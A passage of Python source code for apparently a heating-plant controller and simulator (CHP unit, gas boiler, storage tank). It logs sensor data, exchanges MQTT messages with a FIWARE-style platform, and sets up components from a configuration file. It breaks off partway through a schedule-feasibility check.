def write_output_into_file(self, F, record_step_in_s, last_record_time, actual_time, act_time_in_h, ambient_temp, chp, kessel, cvalve, tank, tsm):
[d1, d2, d3, d4, d5, d6, d7, d8, d9, d10, d11, d12, d13, d14, d15, d16, d17, d18, d19, d20] = tank.dhw_profile_temperatures()
if((actual_time - last_record_time).total_seconds() >= record_step_in_s):
F.write(" {} {} {}".format(actual_time,act_time_in_h,ambient_temp))
F.write(" {} {} {}".format(self.t1,self.t2,self.t3))
F.write(" {} {} {}".format(self.t4,self.t5,self.t6))
F.write(" {} {} {}".format(self.t7,self.t8,self.t9))
F.write(" {} {} {}".format(self.t10,self.t11,self.t12))
F.write(" {} {} {}".format(self.t13,self.t14,self.t15))
F.write(" {} {} {}".format(self.t16,self.t17,self.t18))
F.write(" {} {} {}".format(self.t19,self.t20,self.t21))
F.write(" {} {} {}".format(self.t22,self.t23,self.t24))
F.write(" {} {} {}".format(self.t25,self.t26,self.t27))
F.write(" {} {} {}".format(self.t28,self.t29,self.t30))
F.write(" {} {} {}".format(self.V_1,self.V_2,self.V_3))
F.write(" {} {} {}".format(self.V_4,self.Z_1,self.Z_2))
F.write(" {} {} {}".format(self.Wh1,self.Wh2,self.Wh3))
F.write(" {} {} {}".format(chp.get_status(),kessel.get_status(),cvalve.get_hub()))
F.write(" {} {} {}".format(self.too_cold,tank.get_mstr_dhw(),tank.get_mstr_hw()))
F.write(" {} {} {}".format(tank.get_el_heater_status(),tank.get_slice_wechsel_zeit_in_h(),tsm.get_timestep()))
F.write(" {} {} {}".format(int(self.unload),int(self.keep_chp_on),int(self.keep_chp_off)))
F.write(" {} {}".format(int(self.tank_state), int(self.dhw_prod)))
F.write(" {} {} {}".format(d1,d2,d3))
F.write(" {} {} {}".format(d4,d5,d6))
F.write(" {} {} {}".format(d7,d8,d9))
F.write(" {} {} {}".format(d10,d11,d12))
F.write(" {} {} {}".format(d13,d14,d15))
F.write(" {} {} {}".format(d16,d17,d18))
F.write(" {} {} ".format(d19,d20))
F.write(" \n")
#print('act_time= {}; last_rec = {}; Delta={}'.format(actual_time, last_record_time, (actual_time - last_record_time).total_seconds()))
last_record_time = actual_time
return last_record_time
#end write_output_into_file
# ==================================================================
def send_data_to_platform(self, actual_time, act_time_in_h, chp, kessel, cvalve, tank, client, G):
""" communication with platform - sends the set of monitoring data from RVK to the mqtt broker """
#columns = [" 'T' 'iteration'",
columns = ['iteration',
'T01_Sp01',
'T02_Sp02',
'T03_Sp03',
'T04_Sp04',
'T05_Sp05',
'T06_Sp06',
'T07_Sp07',
'T08_Sp08',
'T09_Sp09',
'T10_Sp10',
'T11_Sp11',
'T12_Sp12',
'T13_Sp13',
'T14_Sp14',
'T15_Sp15',
'T16_Sp16',
'T17_Sp17',
'T18_Sp18',
'T19_Sp19',
'T20_Sp20',
'T21_DomesticHotWater',
'T22_DomesticColdWater',
'T23_Supply_HeatingBeforeMixValve',
'T24_Return_HeatingCircuit',
'T25_Supply_HeatingCircuit',
'T26_Supply_CHPunit',
'T27_Return_CHPunit',
'T28_Supply_GasBoiler',
'T29_Return_GasBoiler',
'T30_AmbientAirTemperature',
'V01_ColdDrinkingWater',
'V02_HeatingCircuit',
'V03_CHPunit',
'V04_GasBoiler',
'Vgas01_MainMeter',
'Vgas02_CHPunit',
'Wh01_HeatSources',
'Wh02_HeaterRod',
'Wh03_MainMeter',
'chp_status',
'boiler_status',
'control_valve_hub',
'storage_tank_too_cold_status',
'mass_flow_dhw',
'mass_flow_heating_water',
'elctric_heater_status',
'turnover_time_of_one_seg_in_h']
xtime = actual_time.replace(tzinfo=timezone.utc).timestamp()
#myshft = 100000000.0
#x1 = float(int(xtime/myshft))
#x2 = float(int(xtime-x1*myshft))
#x3 = xtime - int(xtime)
(x1,x2,x3) = utils.decompose_utc_time_to_floats(xtime)
data_to_send = []
# data_to_send.append(actual_time.isoformat()) # 1
data_to_send.append(x2) # 1
#data_to_send.append(str(actual_time)) # 1
data_to_send.append(self.t1) # 2
data_to_send.append(self.t2) # 3
data_to_send.append(self.t3) # 4
data_to_send.append(self.t4) # 5
data_to_send.append(self.t5) # 6
data_to_send.append(self.t6) # 7
data_to_send.append(self.t7) # 8
data_to_send.append(self.t8) # 9
data_to_send.append(self.t9) # 10
data_to_send.append(self.t10) # 11
data_to_send.append(self.t11) # 12
data_to_send.append(self.t12) # 13
data_to_send.append(self.t13) # 14
data_to_send.append(self.t14) # 15
data_to_send.append(self.t15) # 16
data_to_send.append(self.t16) # 17
data_to_send.append(self.t17) # 18
data_to_send.append(self.t18) # 19
data_to_send.append(self.t19) # 20
data_to_send.append(self.t20) # 21
data_to_send.append(self.t21) # 22
data_to_send.append(self.t22) # 23
data_to_send.append(self.t23) # 24
data_to_send.append(self.t24) # 25
data_to_send.append(self.t25) # 26
data_to_send.append(self.t26) # 27
data_to_send.append(self.t27) # 28
data_to_send.append(self.t28) # 29
data_to_send.append(self.t29) # 30
data_to_send.append(self.t30) # 31
data_to_send.append(self.V_1) # 32
data_to_send.append(self.V_2) # 33
data_to_send.append(self.V_3) # 34
data_to_send.append(self.V_4) # 35
data_to_send.append(self.Z_1) # 36
data_to_send.append(self.Z_2) # 37
data_to_send.append(self.Wh1) # 38
data_to_send.append(self.Wh2) # 39
data_to_send.append(self.Wh3) # 40
data_to_send.append(chp.get_status()) # 41
data_to_send.append(kessel.get_status()) # 42
data_to_send.append(cvalve.get_hub()) # 43
data_to_send.append(self.too_cold) # 44
#data_to_send.append(tank.get_mstr_dhw()) # 45
#data_to_send.append(tank.get_mstr_hw()) # 46
#data_to_send.append(tank.get_el_heater_status()) # 47
data_to_send.append(x1) # 45
data_to_send.append(x2) # 46
data_to_send.append(x3) # 47
data_to_send.append(xtime) # 48
#data_to_send.append(actual_time.replace(tzinfo=timezone.utc).timestamp()) # 49 ==> 48
if(self.dbg == 2):
#G.write('{} {} {} {} {} {}\n'.format(actual_time.replace(tzinfo=timezone.utc).timestamp(), actual_time, act_time_in_h,x1,x2,x3))
#G.write('{} {} {} {} {} {}\n'.format(xtime, actual_time, act_time_in_h,x1,x2,x3))
G.write('{} {} {}\n'.format(xtime, actual_time, data_to_send))
#data_to_send.append(actual_time.replace(tzinfo=timezone.utc).timestamp()) # 49
#apiKey = 'QKAAbMxLbv5TfhFxjTv4lhw92m'
#sensor_name = 'urn:ngsi-ld:rvk:001'
#attributes = 'attrs'
apiKey = self.mqtt_api_key
sensor_name = self.mqtt_sensor_name
attributes = self.mqtt_attributes
topic = "/{}/{}/{}".format(apiKey, sensor_name, attributes)
#client = mqtt.Client('rvk')
#client.connect('mqtt-broker', port=1883, keepalive=60, bind_address="")
payloads = ['{}|{}'.format(c,d) for c, d in zip(columns, data_to_send)]
client.publish(topic,'|'.join(payloads))
if(self.dbg == 1):
print('published data to topic = {}'.format(topic))
#print(data_to_send)
#if(not real_time_send):
# sleep(sleep_time_in_s)
# end send_data_to_platform
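    # ..................................................................
    # Illustrative payload sketch (values are assumptions, not taken from a real run):
    # send_data_to_platform publishes one '|'-separated string of 'column|value'
    # pairs on the attribute topic, e.g. for the first columns:
    #   topic   = "/<apiKey>/<sensor_name>/<attributes>"
    #   payload = "iteration|1618.0|T01_Sp01|62.3|T02_Sp02|61.8|..."
    # ..................................................................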
# ==================================================================
def create_mqtt_client(self, broker, port_nr, client_name, authentication, mqtt_username, mqtt_password, tls_connection):
# my broker == endpoint of Stephan Wiemann
if(self.dbg == 1):
print('create client {}'.format(client_name))
client = mqtt.Client(client_name)
client.on_connect = self.on_connect
client.on_message = self.on_message
client.on_publish = self.on_publish
client.on_disconnect = self.on_disconnect
if(self.dbg == 1):
print('connect client {} to broker'.format(client_name))
if(authentication):
client.username_pw_set(mqtt_username, password=mqtt_password)
if tls_connection:
client.tls_set(tls_version=ssl.PROTOCOL_TLSv1_2)
client.tls_insecure_set(False)
client.connect(broker, port=port_nr, keepalive=60, bind_address="") # connect
return client
# end create_mqtt_client
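    # Usage sketch (a minimal example, assuming the configured mqtt_* values have been loaded):
    #   client = self.create_mqtt_client(self.mqtt_broker, self.mqtt_port_nr, self.mqtt_client_name,
    #                                    False, None, None, False)
    #   self.subscribe_to_schedule(client, self.mqtt_api_key, self.mqtt_sensor_name, self.mqtt_commands)
    #   client.loop_start()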
# ==================================================================
def create_mqtt_client2(self, broker, port_nr, client_name, authentication, mqtt_username, mqtt_password, tls_connection):
if(self.dbg == 1):
print('DEMO create client {}'.format(client_name))
client = mqtt.Client(client_name)
client.on_connect = self.on_connect
client.on_message = self.on_message2
#client.on_publish = self.on_publish
client.on_disconnect = self.on_disconnect
if(self.dbg == 1):
print('DEMO connect client2 {} to broker'.format(client_name))
if(authentication):
client.username_pw_set(mqtt_username, password=mqtt_password)
if tls_connection:
client.tls_set(tls_version=ssl.PROTOCOL_TLSv1_2)
client.tls_insecure_set(False)
client.connect(broker, port=port_nr, keepalive=60, bind_address="") # connect
return client
# end create_mqtt_client2
# ==================================================================
def subscribe_to_schedule(self, client, apiKey, sensor_name, attributes):
#apiKey = 'QKAAbMxLbv5TfhFxjTv4lhw92m'
#sensor_name = 'urn:ngsi-ld:rvk:001'
        #attributes = 'cmd' # TODO: confirm with Stephan which attribute name the FIWARE MQTT tutorial expects here
#topic = "#"
topic = "/{}/{}/{}".format(apiKey, sensor_name, attributes)
client.subscribe(topic) # subscribe
#client.loop_start()
if(self.dbg == 1):
print('subscribed to topic = {}'.format(topic))
# end subscribe_to_schedule
# ==================================================================
def decode_schedule_from_ul_msg(self, message):
if(self.dbg == 1):
print('ENTERed decode_schedule_from_ul_msg')
isvalid = False
content = False
msg = str(message.payload.decode("utf-8")).split("|") # list of strings
if(self.dbg == 2):
GG = open("{}/mysched.dat".format(self.dbg_path),"w")
GG.write(' schedule received from the platform \n')
GG.write(' {} '.format(msg))
GG.close()
sched = {}
isvalid = False
time_data = {'valid': False}
if(self.dbg == 1):
print('time_data VOR = {}'.format(time_data))
cmd_type = msg[1]
if(self.dbg == 1):
print('cmd_type = {}'.format(cmd_type))
if(cmd_type == 'schedule'):
result_array = []
times = msg[6::3] # all time stamps
flags = msg[7::3] # all validity flags
vals = msg[8::3] # all values of electricity production
if((len(times)==len(flags))and(len(times)==len(vals))and(len(flags)==len(vals))):
if(len(times)>0):
content = True
for ii in range(len(times)):
out_time = utils.extract_time_stamp_from_string(times[ii])
result_array.append({'time_stamp' : out_time, 'activation' : bool(flags[ii]) , 'energy_production_in_W' : float(vals[ii])})
if((msg[2]=='timestep_in_s') and (msg[4]=='active schedule')):
sched = {'timestep_in_s': float(msg[3]), 'active schedule': bool(msg[5]), 'values': result_array}
if(content):
isvalid = True
# end if(cmd_type == 'schedule'):
elif(cmd_type == 'time_sync'):
act_time = utils.extract_time_stamp_from_string(msg[7])
time_data = {'start_time_in_h': float(msg[3]), 'end_time_in_h': float(msg[5]), 'actual_time': act_time, 'valid': True}
# end elif(cmd_type == 'time_sync'):
else:
print('\n\n\n\n received invalid command from platform {}\n\n\n\n'.format(cmd_type))
#self.control_execute_schedule()
#return (isvalid, sched)
if(self.dbg == 1):
print('time_data NACH = {}'.format(time_data))
return (cmd_type, isvalid, sched, time_data)
# end decode_schedule_from_ul_msg
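    # Assumed message layout parsed above (illustration derived from the indices used, not a specification):
    #   msg[0]           device / command id
    #   msg[1]           cmd_type: 'schedule' or 'time_sync'
    #   for 'schedule':  msg[2]='timestep_in_s', msg[3]=value, msg[4]='active schedule', msg[5]=flag,
    #                    msg[6:] repeating triplets of time stamp | validity flag | production value in W
    #   for 'time_sync': msg[3]=start time in h, msg[5]=end time in h, msg[7]=actual time stamp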
# ==================================================================
def on_message(self, client, userdata, message):
# receives the schedule for rvk - or the times for simulation
(cmd_type, isvalid, sched, time_data) = self.decode_schedule_from_ul_msg(message)
#(isvalid, sched) = self.decode_schedule_from_ul_msg(message, placex)
if(self.dbg == 2):
print(isvalid, sched)
if(cmd_type == 'schedule'): # received the schedule
if(isvalid):
self.current_schedule = sched
self.schedule_changed = True
else:
print('received an invalid schedule')
#end if(cmd_type == 'schedule'):
elif(cmd_type == 'time_sync'): # received the times for simulation in multi gateway mode without real time operation
self.time_data = time_data
# end on_message
# ==================================================================
def on_message2(self, client, userdata, message):
# receives heat production in the given time slot from the demonstrator
if(self.dbg == 1):
print('\n\nON MESSAGE 2 \n\n')
msg = str(message.payload.decode("utf-8")).split("|") # list of strings
if(self.dbg == 1):
print(msg,type(msg))
time_stamp = utils.extract_time_stamp_from_string(msg[0])
self.q_in_kW = float(msg[1])
self.got_demo_data = True
if(self.dbg == 1):
print('got {} from demo1 at time {}'.format(self.q_in_kW, time_stamp))
# end on_message2
# ==================================================================
def on_connect(self, client, userdata, flags, rc):
if(self.dbg == 1):
print('\n\nON CONNECT\n\n')
if rc == 0:
client.connected_flag = True
else:
print('Bad connection returned code {}'.format(rc))
client.loop_stop()
# ==================================================================
def on_disconnect(self, client, userdata, rc):
print('client has disconnected')
# ==================================================================
def on_publish(self, client, userdata, message):
if(self.dbg == 1):
print(".", end = '')
#print("ON PUBLISH {}".format(client))
#print("received message =", str(message.payload.decode("utf-8")))
# ==================================================================
def initialize_components(self, config_file):
conf_calc = config_file['calculation']
time_step_in_s = conf_calc['time_step_in_s'] # in seconds
record_step_in_s = conf_calc['record_step_in_s'] # in seconds
self.dbg_path = config_file['calculation']['simulation_mode']['dbg_path']
start_sim_inh = conf_calc['simulation_mode']['start_sim_in_hours'] # starting time of the simulation in h
end_sim_inh = conf_calc['simulation_mode']['end_sim_in_hours'] # end time of the simulation in h
wetter_file = utils.check_and_open_file(conf_calc['simulation_mode']['weather_file_path']) # list of strings
dhw_load_file = utils.check_and_open_file(conf_calc['simulation_mode']['dhw_profile_file_path']) # list of strings
#el_load_file = utils.check_and_open_file(conf_calc['simulation_mode']['el_load_file_path']) # list of strings
el_load_file = 0
real_time_send = conf_calc['platform_mode']['real_time_send']
sleep_time_in_s = conf_calc['platform_mode']['sleep_time_in_s']
sim_flag = conf_calc['mode']
if(sim_flag == 'simulation'):
simulation = True
platform = False
elif(sim_flag == 'platform'):
simulation = True
platform = True
elif(sim_flag == 'multigw'):
simulation = False
platform = True
else:
simulation = False
platform = False
actual_time = self.initialize_actual_time(real_time_send, start_sim_inh, end_sim_inh) # time in datetime format
F = open(conf_calc['simulation_mode']['output_file_path'],"w")
# mqtt
conf_plat = conf_calc['platform_mode']
self.mqtt_broker = conf_plat['mqtt_broker']
self.mqtt_port_nr = conf_plat['mqtt_port_nr']
self.mqtt_api_key = conf_plat['mqtt_api_key']
self.mqtt_sensor_name = conf_plat['mqtt_sensor_name']
self.mqtt_attributes = conf_plat['mqtt_attributes']
self.mqtt_client_name = conf_plat['mqtt_client_name_attr']
self.mqtt_commands = conf_plat['mqtt_commands']
#self.mqtt_client_name_cmd = conf_plat['mqtt_client_name_cmd']
conf_comp = config_file['components']
tsm = timestep.timestepmanager(time_step_in_s, conf_comp['timestep_manager']['minimal_timestep_in_s'], actual_time)
self.tsm = tsm
chp = self.initialize_chp_unit(conf_comp['chp_unit'], actual_time)
self.chp = chp
kessel = self.initialize_gas_boiler(conf_comp['gas_boiler'], actual_time)
self.boiler = kessel
tank = self.initialize_storage_tank(conf_comp['storage_tank'], actual_time, tsm, self.dbg_path)
self.storage_tank = tank
cvalve = controlvalve.ThreeWayControlValve(conf_comp['control_valve']['initial_hub_position_0_1'])
heizkurve = self.initialize_heating_curve(conf_comp['heating_curve'])
self.heizkurve = heizkurve
# prediction - global and output
self.prediction_time_step_in_s = config_file['prediction']['prediction_time_step_in_s']
self.next_prediction_timestamp = actual_time + timedelta(seconds=self.prediction_time_step_in_s)
self.output_horizon_in_h = config_file['prediction']['output_horizon_in_h']
self.output_resolution_in_s = config_file['prediction']['output_resolution_in_s']
# sending of monitoring data to the platform
self.send_intervall_in_s = config_file['calculation']['send_intervall_in_s']
self.send_intervall_in_s = max(self.send_intervall_in_s, time_step_in_s) # validity of the data
self.next_sending_timestamp = actual_time + timedelta(seconds=self.send_intervall_in_s)
# Martin's code
conf_pred = config_file['prediction']['heat']
pred_res_in_s = config_file['prediction']['power']['resolution_in_s']
powr_conf = config_file['prediction']['power']
pred = self.initialize_thermal_prediction(config_file)
predict_thermal.write_init(conf_pred['path_result'])
#if(platform):
#crdb_endpoint = config_file['calculation']['platform_mode']['crdb_endpoint']
#crdb_endpoint_add = config_file['calculation']['platform_mode']['crdb_endpoint_add']
#crdb_username = config_file['calculation']['platform_mode']['crdb_username']
#crdb_direct_com = config_file['calculation']['platform_mode']['crdb_direct_com']
#pred.initialize_crate_db_connection(crdb_endpoint, crdb_endpoint_add, crdb_username, crdb_direct_com)
# schedule
self.current_schedule = self.initialize_schedule(actual_time)
# demonstrator
demonstrator = conf_calc['demonstrator_mode']['activated']
# control
heatc_conf = config_file['components']['heating_curve']
# multi gateway mode
multiple_gateways = config_file['calculation']['platform_mode']['multiple_gateways']
provisioning_endpoint = config_file['calculation']['platform_mode']['provisioning_endpoint']
#device_id = config_file['calculation']['platform_mode']['mqtt_sensor_name']
device_id = self.mqtt_sensor_name
# authentication
authentication = config_file['calculation']['platform_mode']['authentication']['activate']
mqtt_username = config_file['calculation']['platform_mode']['authentication']['mqtt_username']
mqtt_password = config_file['calculation']['platform_mode']['authentication']['mqtt_password']
tls_connection = config_file['calculation']['platform_mode']['authentication']['tls_connection']
mqtt_topic_attr = "/{}/{}/{}".format(self.mqtt_api_key, device_id, self.mqtt_attributes)
self.dbg = config_file['calculation']['simulation_mode']['dbg_level']
return (platform, simulation, time_step_in_s, record_step_in_s, start_sim_inh, end_sim_inh, wetter_file, dhw_load_file, el_load_file,
actual_time, F, tsm, tank, chp, kessel, cvalve, heizkurve, pred, real_time_send, sleep_time_in_s, demonstrator, pred_res_in_s,
powr_conf, heatc_conf, multiple_gateways, provisioning_endpoint, device_id, authentication, mqtt_username, mqtt_password, tls_connection,
mqtt_topic_attr)
# end function initialize_components
# ==================================================================
def initialize_thermal_prediction(self, config_file):
""" copyright by Martin Knorr """
conf_pred = config_file['prediction']['heat']
conf_powr = config_file['prediction']['power']
# config_json
n_day = conf_pred['n_day']
n_values = conf_pred['n_values_per_day']
precision_in_h = conf_pred['precision_in_h']
use_predef_loads = conf_pred['use_predef_loads']
predef_loads_file_path = conf_pred['path_loads']
# heating curve
conf_hk = config_file['components']['heating_curve']
hk_ta = conf_hk['design_ambient_temperature_oC']
hk_ti = conf_hk['design_indoor_temperature_oC']
hk_tv = conf_hk['design_supply_temperature_oC']
hk_tr = conf_hk['design_return_temperature_oC']
hk_n = conf_hk['radiator_coefficient_n']
hk_m = conf_hk['radiator_coefficient_m']
hk_qn = conf_hk['design_heat_load_in_kW']
# chp unit
patm = utils.get_pressure_in_MPa()
calcopt = utils.get_calc_option()
eps_el_chp = config_file['components']['chp_unit']['electrical_efficiency']
eps_th_chp = config_file['components']['chp_unit']['thermal_efficiency']
qel_n_chp = config_file['components']['chp_unit']['max_electric_power_in_kW']
chp_tinp = config_file['components']['chp_unit']['design_input_temperature_oC']
chp_tmax = config_file['components']['chp_unit']['design_output_temperature_oC']
qth_n_chp = eps_th_chp * qel_n_chp / eps_el_chp # in kW
mstr_chp = qth_n_chp / (utils.cp_fluid_water(0.5 * (chp_tmax + chp_tinp), patm, calcopt) * (chp_tmax - chp_tinp)) # in kg/s = kW / (kJ/kg/K * K)
# gas boiler
qth_n_gb = config_file['components']['gas_boiler']['max_thermal_power_in_kW']
gb_tinp = config_file['components']['gas_boiler']['design_input_temperature_oC']
gb_tmax = config_file['components']['gas_boiler']['design_output_temperature_oC']
        mstr_gb = qth_n_gb / (utils.cp_fluid_water(0.5 * (gb_tinp + gb_tmax), patm, calcopt) * (gb_tmax - gb_tinp)) # in kg/s = kW / (kJ/kg/K * K)
# storage tank
effective_height = config_file['components']['storage_tank']['effective_heigth_in_m']
inner_radius = config_file['components']['storage_tank']['inner_radius_tank_in_m']
effective_pipe_volume = config_file['components']['storage_tank']['effective_coil_volume_in_m3']
effective_volume = config_file['components']['storage_tank']['effective_volume_in_m3']
if (effective_volume <= 0.0):
effective_volume = math.pi * inner_radius * inner_radius * effective_height - effective_pipe_volume # in m3
nr_calc = 20
slice_volume = effective_volume / nr_calc # in m3
qmax_rod_el = config_file['components']['storage_tank']['power_heating_rod_in_kW']
open_weather_map_active = config_file['calculation']['platform_mode']['open_weather_map_active']
# conf_powr
#print('\n initialize_thermal_prediction')
#print('use_predef_loads = {}; {}'.format(use_predef_loads,type(use_predef_loads)))
#print('predef_loads_file_path = {}; {}'.format(predef_loads_file_path,type(predef_loads_file_path)))
return predict_thermal.predict_Q(n_day, n_values, precision_in_h, predef_loads_file_path, use_predef_loads, self.output_horizon_in_h,
self.output_resolution_in_s, conf_powr, hk_tv, hk_tr, hk_ti, hk_ta, hk_qn, hk_n, hk_m, chp_tmax, gb_tmax, slice_volume,
mstr_chp, mstr_gb, qmax_rod_el, eps_th_chp, eps_el_chp, open_weather_map_active)
#end initialize_thermal_prediction
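    # Worked example for the CHP design mass flow above (numbers are assumptions):
    #   eps_el = 0.3, eps_th = 0.6, qel_n = 5 kW  ->  qth_n = 0.6 * 5 / 0.3 = 10 kW
    #   with chp_tinp = 60 °C, chp_tmax = 80 °C and cp ~ 4.19 kJ/(kg K):
    #   mstr_chp = 10 / (4.19 * (80 - 60)) ~ 0.12 kg/s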
# ==================================================================
def initialize_schedule(self, actual_time):
nn = int((self.output_horizon_in_h * 3600.0) // self.output_resolution_in_s)
if((self.dbg == 1) or (self.dbg == 2)):
print('\n\n initialize schedule. typ of n = {}; n = {}'.format(type(nn),nn))
result_array = []
for ii in range(nn):
newx = {'time_stamp' : actual_time + timedelta(seconds = self.output_resolution_in_s * ii), 'activation' : False , 'energy_production_in_W' : (np.random.random()*2000.0 - 1000.0)}
result_array.append(newx)
#print(newx)
schedule = {'timestep_in_s' : 900, 'active schedule' : False, 'values' : result_array}
#print('result_array = {}'.format(result_array))
#print('schedule = {}'.format(schedule))
return schedule
#end initialize_schedule
# ==================================================================
def initialize_heating_curve(self, config_json):
design_ambient_temperature_oC = config_json['design_ambient_temperature_oC']
design_indoor_temperature_oC = config_json['design_indoor_temperature_oC']
design_supply_temperature_oC = config_json['design_supply_temperature_oC']
design_return_temperature_oC = config_json['design_return_temperature_oC']
radiator_coefficient_n = config_json['radiator_coefficient_n']
radiator_coefficient_m = config_json['radiator_coefficient_m']
design_heat_load_in_kW = config_json['design_heat_load_in_kW']
self.tni = design_indoor_temperature_oC
self.coef = (design_indoor_temperature_oC - design_ambient_temperature_oC) / design_heat_load_in_kW
return heatingcurve.HeatingSystem(design_ambient_temperature_oC, design_indoor_temperature_oC, design_supply_temperature_oC,
design_return_temperature_oC, radiator_coefficient_n, radiator_coefficient_m, design_heat_load_in_kW)
#end initialize_heating_curve
# ==================================================================
def initialize_gas_boiler(self, config_json, actual_time):
thermal_efficiency = config_json['thermal_efficiency']
max_thermal_power_in_kW = config_json['max_thermal_power_in_kW']
initial_status_0_1 = config_json['initial_status_0_1']
min_resting_time_in_s = config_json['min_resting_time_in_s']
design_input_temperature_oC = config_json['design_input_temperature_oC']
design_output_temperature_oC = config_json['design_output_temperature_oC']
design_ambient_temperature_oC = config_json['design_ambient_temperature_oC']
return gasheater.GasBoiler(thermal_efficiency, max_thermal_power_in_kW, initial_status_0_1, min_resting_time_in_s,
design_input_temperature_oC, design_output_temperature_oC, design_ambient_temperature_oC, actual_time)
#end initialize_gas_boiler
# ==================================================================
def initialize_chp_unit(self, config_json, actual_time):
electrical_efficiency = config_json['electrical_efficiency']
thermal_efficiency = config_json['thermal_efficiency']
max_electric_power_in_kW = config_json['max_electric_power_in_kW']
initial_status_0_1 = config_json['initial_status_0_1']
min_resting_time_in_s = config_json['min_resting_time_in_s']
design_input_temperature_oC = config_json['design_input_temperature_oC']
design_output_temperature_oC = config_json['design_output_temperature_oC']
design_ambient_temperature_oC = config_json['design_ambient_temperature_oC']
return chpunit.ChpUnit(electrical_efficiency,thermal_efficiency,max_electric_power_in_kW,initial_status_0_1,
min_resting_time_in_s, design_input_temperature_oC, design_output_temperature_oC, design_ambient_temperature_oC, actual_time)
#end initialize_chp_unit
# ==================================================================
def initialize_storage_tank(self, config_json, actual_time, tsm, dbg_path):
effective_heigth_in_m = config_json['effective_heigth_in_m']
inner_radius_tank_in_m = config_json['inner_radius_tank_in_m']
effective_coil_surface_in_m2 = config_json['effective_coil_surface_in_m2']
effective_coil_volume_in_m3 = config_json['effective_coil_volume_in_m3']
initial_temperature_in_oC = config_json['initial_temperature_in_oC']
effective_volume = config_json['effective_volume_in_m3']
if(initial_temperature_in_oC<(-273.15)):
t_ini = self.t_initial
else:
t_ini = initial_temperature_in_oC
alpha_losses_in_W_m2K = config_json['alpha_losses_in_W_m2K']
power_heating_rod_in_kW = config_json['power_heating_rod_in_kW']
initial_status_heating_rod_0_1 = config_json['initial_status_heating_rod_0_1']
dbg_level = config_json['dbg_level']
return storagetank.HeatStorageTank(effective_heigth_in_m, inner_radius_tank_in_m, effective_volume,
effective_coil_surface_in_m2, effective_coil_volume_in_m3,
t_ini, alpha_losses_in_W_m2K, actual_time, power_heating_rod_in_kW,
initial_status_heating_rod_0_1, tsm, 'implizit', 1, dbg_level, dbg_path) #
#end initialize_storage_tank
# ==================================================================
def save_data_for_prediction(self, pred, act_time_in_h, ambient_temp):
# Martin's code
qHeat = self.V_2 * utils.rho_fluid_water(self.t24, self.p_atm, 1) * (self.t25 - self.t24)
qDHW = self.V_1 * utils.rho_fluid_water(self.t22, self.p_atm, 1) * (self.t21 - self.t22)
#pred.run_to_save_data(act_time_in_h+2, qHeat + qDHW, ambient_temp)
pred.run_to_save_data(act_time_in_h, qHeat + qDHW, ambient_temp)
# if (pred.get_q_write()):
# predict_thermal.write_q(t[index],t_e_1day,q_1day,t_e_2day,q_2day)
#end save_data_for_prediction
# ==================================================================
def free_sched(self):
# resets the saved data for schedule calculation
self.tau_end = 0 # datetime - end of the current time slot
        self.tau_off = 0 # datetime - until this time self.e_produced_in_kWh is expected to reach the scheduled value
self.e_produced_in_kWh = 0 # double - aggregated production in this time slot
self.e_to_prod_in_kWh = 0 # double - envisioned production in this time slot
self.production = [] # list of dicts - contains production data for the last timestep
#self.sched_idx = 0 # index in list of dicts
# end free_sched
# ==================================================================
def calc_energy_prod_in_old_step(self, actual_time):
# returns energy in kWh that has been produced for the time slot in the current schedule
# during the validity of the old schedule
        # the returned value should be mostly zero or close to it - as long as getting an updated schedule does not take longer than one time step
        # find tau_start_new in the saved production data and integrate it up to the actual time
        # tau_start_new
tau_start = self.current_schedule['values'][0]['time_stamp'] - timedelta(seconds=self.output_resolution_in_s)
Q_old_in_kWh = 0.0
if (len(self.production) > 0):
ii = 0
# find index of the tau_start_new in the saved production
while(self.production[ii]['time_stamp'] <= tau_start):
ii += 1
jj = ii
while(self.production[ii]['time_stamp'] <= actual_time):
ii += 1
#Q_chp_el = self.Wh1
#Q_rod_el = self.Wh2
#Q_cons_el = self.Wh3 - self.Wh2 - self.Wh1
#Q_old += Q_chp_el - Q_rod_el - Q_cons_el # = 2*Wh - Wh3 = Wh1 - Wh2 - Wh3 + Wh2 + Wh1
#Q_old += self.production[]
Q_old_in_kWh = Q_old_in_kWh + self.production[ii]['Q_in_kWh']
return Q_old_in_kWh
# end calc_energy_prod_in_old_step
# ==================================================================
def get_val_from_sched(self, sched, actual_time):
result_array = sched['values']
ii = 0
# find the position of actual_time in the current schedule
while(result_array[ii]['time_stamp'] <= actual_time):
ii += 1
# return the data
valid_time = result_array[ii]['time_stamp']
set_point_val = result_array[ii]['energy_production_in_W']
is_active = result_array[ii]['activation']
return (ii, valid_time, is_active, set_point_val)
# end get_val_from_sched
# ==================================================================
def check_validity_of_sched(self, actual_time):
# returns :
# - index of the scheduled timeslot in the current valid schedule
# - time stamp marking the end of the scheduled timeslot in datetime format
# - the flag declaring whether the scheduled value is valid (True)
# - the value of average electrical power to be produced within the scheduled time slot in W
# if flag is True, the returned value might differ from zero W
# is the whole schedule active?
c1 = self.current_schedule['active schedule']
        # is the current schedule not outdated, i.e. is the last time stamp of the schedule still bigger than the actual time?
values = self.current_schedule['values']
c2 = (actual_time <= values[-1]['time_stamp'])
if(c1 and c2):
            # time stamps in the schedule have to be ordered and monotonically increasing
ii = 0
while (values[ii]['time_stamp'] < actual_time):
ii = ii + 1
# values to be returned
valid_time = values[ii]['time_stamp']
is_active = values[ii]['activation']
value_in_W = values[ii]['energy_production_in_W']
else:
# either whole schedule is invalid or it is outdated
ii = 0
valid_time = actual_time - timedelta(seconds=10)
is_active = False
value_in_W = 0.0
return (ii, valid_time, is_active, value_in_W)
# end check_validity_of_sched
# ==================================================================
def check_feasibility_of_sched(self, actual_time):
# returns True when the production/consumption can be attained
# otherwise returns False
prec_kWh = 0.0 # precision for the conditions, 0 means no errors are allowed
is_valid = True # result, first assumption
q_netto_el_kWh = self.e_to_prod_in_kWh - self.e_produced_in_kWh # amount of energy left to produce
t_netto_s = (self.tau_end - actual_time).seconds # time left for production process
# The installed electric power: for production and usage
q_el_prod_kWh = self.chp.get_design_electric_output() * t_netto_s / 3600.0 # kWh = kW * s *h/3600s
q_el_use_kWh = self.storage_tank.get_max_thermal_rod_power() * t_netto_s / 3600.0 # kWh = kW * s *h/3600s
# installed power:
# is the installed electric power enough to cover the demand?
# case 1: energy should be produced - is there enough time for the system to provide it based on the installed power?
if((q_netto_el_kWh > 0.0) and (q_netto_el_kWh > q_el_prod_kWh + prec_kWh)):
is_valid = False # more energy should be PRODUCED than the installed power allows
# case 2: energy should be consumed - is there enough time for the system to take it up based on the installed power?
if((q_netto_el_kWh < 0.0) and (abs(q_netto_el_kWh) > q_el_use_kWh + prec_kWh)):
